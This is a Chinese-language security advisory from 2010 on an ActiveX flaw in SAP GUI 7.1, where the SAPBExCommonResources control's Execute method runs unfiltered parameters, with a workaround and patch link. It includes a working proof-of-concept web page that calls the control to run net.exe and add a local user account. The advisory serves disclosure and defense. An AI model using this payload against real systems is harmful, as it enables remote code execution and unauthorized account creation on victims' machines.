发布日期：2010-03-23
更新日期：2010-03-24

受影响系统：

SAP Sapgui 7.1

描述：

---

SAPgui是SAP软件的图形用户界面客户端。

SAP GUI所安装的SAPBExCommonResources activeX控件没有正确地过滤传送给Execute调用方式的参数，用户受骗访问了恶意网页并向该方式传送了恶意参数就会导致执行任意代码。

<*来源：Alexey Sintsov （don_huan@xakep.ru）
  
  链接：http://dsecrg.com/pages/vul/show.php?id=164
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>

<script language='Javascript'>
function init()
{
DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);

}
init();
</script>
DSecRG
</html>

建议：

---

临时解决方法：

* 为clsid: A009C90D-814B-11D3-BA3E-080009D22344设置kill bit。

厂商补丁：

SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://service.sap.com/sap/support/notes/1407285

浏览次数：2997
严重程度：0（网友投票）